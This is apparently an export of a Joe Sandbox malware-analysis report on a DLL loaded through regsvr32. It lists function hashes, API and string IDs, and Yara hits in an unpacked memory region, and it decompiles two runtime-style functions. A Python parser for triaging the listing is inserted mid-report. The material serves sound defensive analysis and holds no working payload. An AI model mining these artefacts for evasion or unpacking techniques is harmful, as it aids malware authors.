                                                                                            • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                            • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

Control-flow graph (rendered as text in the export; the edge list is omitted here): basic blocks 180010a8e through 180010ab9; the imported API ExitProcess is called in the first block, followed by a call to the internal routine 180014c90.
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 80118013-0
                                                                                            • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                            • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                            • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                            • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3252650109-0
                                                                                            • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                            • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                            • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                            • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3140674995-0
                                                                                            • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                            • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                            • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                            • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 65%
                                                                                            			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                            				void* _t36;
                                                                                            				int _t38;
                                                                                            				signed long long _t60;
                                                                                            				long long _t63;
                                                                                            				_Unknown_base(*)()* _t82;
                                                                                            				void* _t86;
                                                                                            				void* _t87;
                                                                                            				void* _t89;
                                                                                            				signed long long _t90;
                                                                                            				struct _EXCEPTION_POINTERS* _t95;
                                                                                            
                                                                                            				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                            				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                            				_t87 = _t89 - 0x4f0;
                                                                                            				_t90 = _t89 - 0x5f0;
                                                                                            				_t60 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                            				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                            				E00000001180001C40(_t36);
                                                                                            				r8d = 0x98;
                                                                                            				E00000001180002680();
                                                                                            				r8d = 0x4d0;
                                                                                            				E00000001180002680();
                                                                                            				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                            				_t63 = _t87 + 0x10;
                                                                                            				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                            				__imp__RtlCaptureContext();
                                                                                            				r8d = 0;
                                                                                            				__imp__RtlLookupFunctionEntry();
                                                                                            				if (_t63 == 0) goto 0x800083be;
                                                                                            				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                            				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                            				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                            				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                            				__imp__RtlVirtualUnwind();
                                                                                            				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                            				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                            				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                            				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                            				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                            				_t38 = IsDebuggerPresent();
                                                                                            				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                            				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                            				if (_t38 != 0) goto 0x80008420;
                                                                                            				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                            				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                            			}

                                                                                            Instruction addresses (listing column, one per decompiled statement): 0x1800082ec 0x1800082f1 0x1800082fa 0x180008302 0x180008309 0x180008313 0x180008324 0x180008326 0x180008332 0x180008338 0x180008343 0x180008349 0x180008353 0x18000835c 0x180008360 0x180008365 0x18000837a 0x18000837d 0x180008386 0x180008388 0x18000839b 0x1800083a8 0x1800083b1 0x1800083b8 0x1800083c5 0x1800083d7 0x1800083db 0x1800083e9 0x1800083ed 0x1800083f1 0x1800083fb 0x18000840e 0x180008412 0x180008417 0x180008446

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1239891234-0
                                                                                            • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                            • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                            • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                            • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                            • API String ID: 0-182303197
                                                                                            • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                            • Instruction ID: 9984afed70627d21907dd1263aa047c6166e6b47c9f69a9bca82ffd6eda7c556
                                                                                            • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                            • Instruction Fuzzy Hash: D4121770A04709EFDB58DF68C18A99EBBF1FF44344F40816DE84AAB250D775DA18CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                            • API String ID: 0-557373213
                                                                                            • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                            • Instruction ID: ecf3e3a59dc29732202d4f16f48361c2fe5869cf0ba5be7c0a6d11a15a0d2d43
                                                                                            • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                            • Instruction Fuzzy Hash: 9FE1027550160CCBDF68DF38C0994D93BE1FF58308F611229FC66A62A2DB78D914CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .I$gBfh$i[$w|${
                                                                                            • API String ID: 0-448909954
                                                                                            • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                            • Instruction ID: c4214fb8048abdf002e1a188c2d6409d538264dab7df93c915a10c7ec89c2e74
                                                                                            • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                            • Instruction Fuzzy Hash: 96B13670D207499FDB88DFA9D8898DDBBF0FB48304F40921DE816AB251C778A945CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cp$vm$x$zu$Kn#
                                                                                            • API String ID: 0-3521309225
                                                                                            • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                            • Instruction ID: 72927976356e983b2635bbee8661be541b779410aa818ab73a461cb71620afcc
                                                                                            • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                            • Instruction Fuzzy Hash: CFA103B0D143198FDB58CFA9D8898DEBBF0FB48314F108219E855B7290D3789945CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                            • API String ID: 0-817034907
                                                                                            • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                            • Instruction ID: abc6076ac56165a40d43ed5845e73bd6f5a4d9e38231b422d2b648600362f177
                                                                                            • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                            • Instruction Fuzzy Hash: C44192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,$3T$D-$Rc$l
                                                                                            • API String ID: 0-617906138
                                                                                            • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                            • Instruction ID: 6d49e016ba36e6f6ff1730be1c34d74f2ab854c8dcd8869f83b43b012f4fab05
                                                                                            • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                            • Instruction Fuzzy Hash: B641D5B081078E8FDB44CF64D88A4DE7BF0FB58358F104619E869A6260D3B89668CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                            
                                                                                            				_a32 = __rbx;
                                                                                            			}



                                                                                            0x180001d98

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                            • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                            • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                            • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%
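The function entries in this listing are raw per-function metadata from the Joe Sandbox IDA plugin, and a long dump like this is easier to triage once it is parsed rather than read top to bottom. The following Python is an added example, not part of this report and not code from Joe Sandbox: it parses entries in the layout shown here (the "Memory Dump Source" header, the bullet "Key: Value" fields, the "Yara matches" flag and the "Uniqueness Score" line), then separates functions that sit in memory not backed by a PE image and carry a Yara hit (the 0x731000 region above) from functions that name APIs, such as the CurrentTime/PerformanceCounter/Process/Thread entry in the PE-backed DLL image at 0x180000000. The sample text is constructed from two of the entries above, trimmed to the lines the parser uses. Two points are assumptions about the report format rather than documented behaviour: that "$" separates items in the API ID and String ID lists, and that "based on PE: false" marks a dump region not backed by an on-disk image.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two entries in the layout of the listing above, trimmed to
# the lines this parser uses (a Yara-matched function from the non-PE-backed
# 0x731000 region, and an API-calling function from the DLL image at 0x180000000).
SAMPLE = """
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
• API ID:
• String ID: #0FQ$0T$C;$lXjD$tS
• Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
• Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
• Instruction Fuzzy Hash: C44192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
• Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
• Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
Uniqueness Score: -1.00%
"""

# Assumed from the layout: the dump name, hex offset and PE-backing flag share one line.
SOURCE_RE = re.compile(r"(?P<dump>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
FIELD_RE = re.compile(r"^(?:•\s*)?(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class FunctionEntry:
    fields: Dict[str, str] = field(default_factory=dict)  # every 'Key: Value' line
    dump: str = ""
    offset: int = 0
    pe_backed: bool = False
    yara_match: bool = False
    uniqueness: Optional[float] = None

    @property
    def snapshot(self) -> str:
        return self.fields.get("Snapshot File", "")

    @property
    def api_ids(self) -> List[str]:  # assumed: '$' separates list items
        return [t for t in self.fields.get("API ID", "").split("$") if t]

    @property
    def string_ids(self) -> List[str]:
        return [t for t in self.fields.get("String ID", "").split("$") if t]


def parse_entries(text: str) -> List[FunctionEntry]:
    """Start a new entry at each 'Memory Dump Source' header; fill it from the
    'Key: Value' lines, the 'Yara matches' flag and the 'Uniqueness Score'."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is None or not line:
            continue
        elif line == "Yara matches":
            cur.yara_match = True
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif (m := FIELD_RE.match(line)):
            key, val = m.group("key").strip(), m.group("val").strip()
            cur.fields[key] = val
            if key == "Source File" and (s := SOURCE_RE.search(val)):
                cur.dump, cur.offset = s.group("dump"), int(s.group("off"), 16)
                # assumed: 'based on PE: false' means no on-disk image backs the region
                cur.pe_backed = s.group("pe") == "true"
    return entries


def triage(entries: List[FunctionEntry]) -> Dict[str, List[FunctionEntry]]:
    """Non-PE-backed functions with a Yara hit are the likely unpacked payload;
    functions naming APIs are the ones worth reading first in the DLL image."""
    return {
        "unpacked_yara_hits": [e for e in entries if not e.pe_backed and e.yara_match],
        "api_callers": [e for e in entries if e.api_ids],
    }


def inconsistent_hashes(entries: List[FunctionEntry]) -> List[FunctionEntry]:
    """Entries whose Opcode ID and Opcode Fuzzy Hash differ (identical for every
    function in the listing above, so a non-empty result flags a parsing slip)."""
    return [e for e in entries if e.fields.get("Opcode ID") != e.fields.get("Opcode Fuzzy Hash")]
```

Run against the full listing, `triage()` gives the analyst two short lists to start from: the Yara-matched functions in the unbacked 0x731000 snapshot, which are the code to pull into a disassembler first, and the API-naming functions, whose Instruction Fuzzy Hash values can then be compared across samples. The `fields` dictionary keeps every bullet the parser does not interpret, so the API String ID and Instruction ID values stay available without the parser having to assign them a meaning.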

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$ $UCV$y4.)
                                                                                            • API String ID: 0-917551206
                                                                                            • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                            • Instruction ID: be0444f89f85d4aeeb64db146e1305562bc191515f28a4cc7ac981ab9fc919c4
                                                                                            • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                            • Instruction Fuzzy Hash: 8512E4B1A0470D9FDB58DFA8E08A4DDBBF2FB48344F00412DE946A7290D7B9D819CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$rq%$tL>$".
                                                                                            • API String ID: 0-3922733902
                                                                                            • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                            • Instruction ID: 0c9e683c7d2b6fa3a9a7d776b2486a085bebdd9bfd2396ebf6708486ae6fe575
                                                                                            • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                            • Instruction Fuzzy Hash: E122CF719097C88BDBF8DF24C8896DD37F0FF48344F90125A984E9A694DBB86684CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: g$-$HE$Vc
                                                                                            • API String ID: 0-2562162751
                                                                                            • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                            • Instruction ID: 271b9e8b3a9d91f8c300b8da7f6817549a3ef6c49e066abf463dbb53c9312d71
                                                                                            • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                            • Instruction Fuzzy Hash: ADA1D1B150478C9FDB88CF28D88A4CD3BB2FB58398F505219FC4A97260D7B8D985CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (;$*i$he$*%
                                                                                            • API String ID: 0-35414758
                                                                                            • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                            • Instruction ID: ca7afd2796b854a03b4d4f13d9afec1787b4fa95774ca1f5cbfe4df767fcd640
                                                                                            • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                            • Instruction Fuzzy Hash: AC711A70514748DBEF88CF28C8895DD3BA1FB48358F565319FC4AA6290D778D484CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: */$I$Yu$(
                                                                                            • API String ID: 0-674225443
                                                                                            • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                            • Instruction ID: a295da282c58d0f45a3c2008693f04ed7c48c3b342830e2f20272594f80479fb
                                                                                            • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                            • Instruction Fuzzy Hash: 72718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$.:$PYq|$W
                                                                                            • API String ID: 0-626586655
                                                                                            • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                            • Instruction ID: 9accd9b29948f2ba704f0ef6b43165ebc28eba98451dd88659277c166b7bda7d
                                                                                            • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                            • Instruction Fuzzy Hash: 7841E37061CB858FD7A8DF28D58A65BBBF0FBD9704F804A1EF589C7250DB7998048B42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5`$<ml$a:$P
                                                                                            • API String ID: 0-330785107
                                                                                            • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                            • Instruction ID: 3800f61d0189c0f3ba110cd30ce8afb42e3c81808e94467df65051d480e4e5d0
                                                                                            • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                            • Instruction Fuzzy Hash: C941F4B190074E8BDB4CDF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
